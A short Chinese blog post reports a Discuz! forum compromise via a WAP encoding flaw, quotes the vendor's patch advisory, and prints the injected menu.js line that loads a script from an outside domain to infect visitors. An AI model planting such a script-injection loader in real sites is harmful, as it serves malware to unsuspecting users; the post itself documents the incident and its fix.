Tag Archives: Wap

chinaz论坛爆“Discuz被挂马，受害人数三万多。官方补丁已出，赶紧打上吧 ”，补丁已出（http://download.comsenz.com/Discuz/patch/ ），不过在半小时前官方才放出来，都还在郁闷官方为啥没放补丁呢！ 这次出问题的又是Wap字符转换问题，看来这个wap鸡肋可以去掉了，看官方给出的安全补丁公告： http://www.discuz.net/thread-1113736-1-1.html 经查，Discuz! wap 功能部分在对文字进行编码转换时，存在合法变量被恶意覆盖问题，此问题将可能导致您的论坛受到安全性威胁。为此我们强烈建议您立即下载补丁进行修补。 * 此补丁包中含有 Discuz! 各版本程序，解开压缩包后，请根据您的版本号更新 * 本次修正不包含 Discuz! 7.0 测试版，建议参与测试的站点暂时关闭wap功能 * 如果您由于某种原因，无法及时修补，请您暂时关闭 “wap” 功能 据了解，是被修改了  menu.js document.writeln(“<script language=javascript src=http:\/ \/www.54zc.cn\/17aq\/a.js><\/script>”) 在某网站统计服务网站查看，截止11月17日中午，受害人数已达34713人。 下午四点左右，Discuz官方康盛技术支持提供了Disucz！安全补丁